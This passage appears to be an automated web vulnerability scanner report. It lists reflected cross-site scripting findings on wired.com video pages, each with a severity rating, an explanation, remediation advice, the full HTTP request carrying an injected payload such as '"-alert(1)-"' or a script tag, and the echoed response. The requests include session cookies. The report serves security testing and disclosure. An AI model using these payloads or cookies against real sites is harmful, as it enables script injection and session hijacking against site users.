CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "the-gun-of-the-future-for-the-truck-of-the-future6894c"-alert(1)-"5f54f5d90f1","latest-videos","latest","660683999001","1815816633","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1215. http://www.wired.com/video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/660683999001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26bcb"-alert(1)-"61dcfa8e6d4 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/the-gun-of-the-future-for-the-truck-of-the-future/66068399900126bcb"-alert(1)-"61dcfa8e6d4 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:48:55 GMT
Date: Mon, 22 Nov 2010 00:43:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106776


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
ype="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest-videos","latest","1815816633","the-gun-of-the-future-for-the-truck-of-the-future","66068399900126bcb"-alert(1)-"61dcfa8e6d4","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1216. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 65aa7--><script>alert(1)</script>2113ffec678 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video65aa7--><script>alert(1)</script>2113ffec678/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29457
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:41:39 GMT
Date: Mon, 22 Nov 2010 00:36:39 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video65aa7--><script>alert(1)</script>2113ffec678/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001
-->
...[SNIP]...

1.1217. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4794"><a>46311d803b9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videoe4794"><a>46311d803b9/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29418
Vary: Accept-Encoding
Cache-Control: max-age=281
Expires: Mon, 22 Nov 2010 00:40:26 GMT
Date: Mon, 22 Nov 2010 00:35:45 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videoe4794"><a>46311d803b9 ss_latest-videos c_latest">
...[SNIP]...

1.1218. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c5d5"-alert(1)-"d2f4632c524 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos6c5d5"-alert(1)-"d2f4632c524/latest/1815816633/tron-legacy--the-payoff/666144939001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=272
Expires: Mon, 22 Nov 2010 00:42:35 GMT
Date: Mon, 22 Nov 2010 00:38:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106798


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "tron-legacy--the-payoff","latest-videos6c5d5"-alert(1)-"d2f4632c524","666144939001","latest","1815816633","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1219. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f7dd7"><a>efaa178a617 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videosf7dd7"><a>efaa178a617/latest/1815816633/tron-legacy--the-payoff/666144939001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:41:44 GMT
Date: Mon, 22 Nov 2010 00:36:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videosf7dd7"><a>efaa178a617 c_latest">
...[SNIP]...

1.1220. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 46eac"><a>eda7bcc3b14 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos/latest46eac"><a>eda7bcc3b14/1815816633/tron-legacy--the-payoff/666144939001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=291
Expires: Mon, 22 Nov 2010 00:43:02 GMT
Date: Mon, 22 Nov 2010 00:38:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106739


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<body class="s_video ss_latest-videos c_latest46eac"><a>eda7bcc3b14">
...[SNIP]...

1.1221. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 86e28"-alert(1)-"7a8fe52dfa6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest86e28"-alert(1)-"7a8fe52dfa6/1815816633/tron-legacy--the-payoff/666144939001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:44:01 GMT
Date: Mon, 22 Nov 2010 00:39:01 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106753


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "tron-legacy--the-payoff","latest86e28"-alert(1)-"7a8fe52dfa6","666144939001","latest-videos","1815816633","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1222. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7c21e"-alert(1)-"2f370036848 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/18158166337c21e"-alert(1)-"2f370036848/tron-legacy--the-payoff/666144939001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=293
Expires: Mon, 22 Nov 2010 00:44:05 GMT
Date: Mon, 22 Nov 2010 00:39:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106750


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "tron-legacy--the-payoff","666144939001","latest-videos","latest","18158166337c21e"-alert(1)-"2f370036848","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1223. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 46df5"-alert(1)-"ca26f7c7b3f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/tron-legacy--the-payoff46df5"-alert(1)-"ca26f7c7b3f/666144939001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:44:19 GMT
Date: Mon, 22 Nov 2010 00:39:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106725


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "666144939001","latest-videos","latest","1815816633","tron-legacy--the-payoff46df5"-alert(1)-"ca26f7c7b3f","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1224. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001 [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 665df"-alert(1)-"860e0e85e38 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos/latest/1815816633/tron-legacy--the-payoff/666144939001665df"-alert(1)-"860e0e85e38 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=291
Expires: Mon, 22 Nov 2010 00:44:27 GMT
Date: Mon, 22 Nov 2010 00:39:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106740


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "tron-legacy--the-payoff","666144939001665df"-alert(1)-"860e0e85e38","latest-videos","latest","1815816633","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1225. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 38a2c--><script>alert(1)</script>0befce43f0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /video38a2c--><script>alert(1)</script>0befce43f0d/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29460
Vary: Accept-Encoding
Cache-Control: max-age=294
Expires: Mon, 22 Nov 2010 00:41:32 GMT
Date: Mon, 22 Nov 2010 00:36:38 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /video38a2c--><script>alert(1)</script>0befce43f0d/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001
-->
...[SNIP]...

1.1226. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a33dc"><a>ed7e9567c2d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /videoa33dc"><a>ed7e9567c2d/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29421
Vary: Accept-Encoding
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:41:07 GMT
Date: Mon, 22 Nov 2010 00:36:07 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_videoa33dc"><a>ed7e9567c2d ss_latest-videos c_latest">
...[SNIP]...

1.1227. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22ce8"-alert(1)-"d4bd5acd3f7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /video/latest-videos22ce8"-alert(1)-"d4bd5acd3f7/latest/1815816633/tron-legacy-clip-long-time/664849976001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=ISO-8859-1
Cache-Control: max-age=300
Expires: Mon, 22 Nov 2010 00:43:07 GMT
Date: Mon, 22 Nov 2010 00:38:07 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 106756


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="
...[SNIP]...
<script type="text/javascript">

CN.dart.init({site:'wiredcom.dart', zone: 'video;', kws:[ "latest","1815816633","tron-legacy-clip-long-time","latest-videos22ce8"-alert(1)-"d4bd5acd3f7","664849976001","video"], charmap : {' ' : '+', '-' : '_'}});
</script>
...[SNIP]...

1.1228. http://www.wired.com/video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /video/latest-videos/latest/1815816633/tron-legacy-clip-long-time/664849976001

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6bdde"><a>8d08fc4d8e6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /video/latest-videos6bdde"><a>8d08fc4d8e6/latest/1815816633/tron-legacy-clip-long-time/664849976001 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
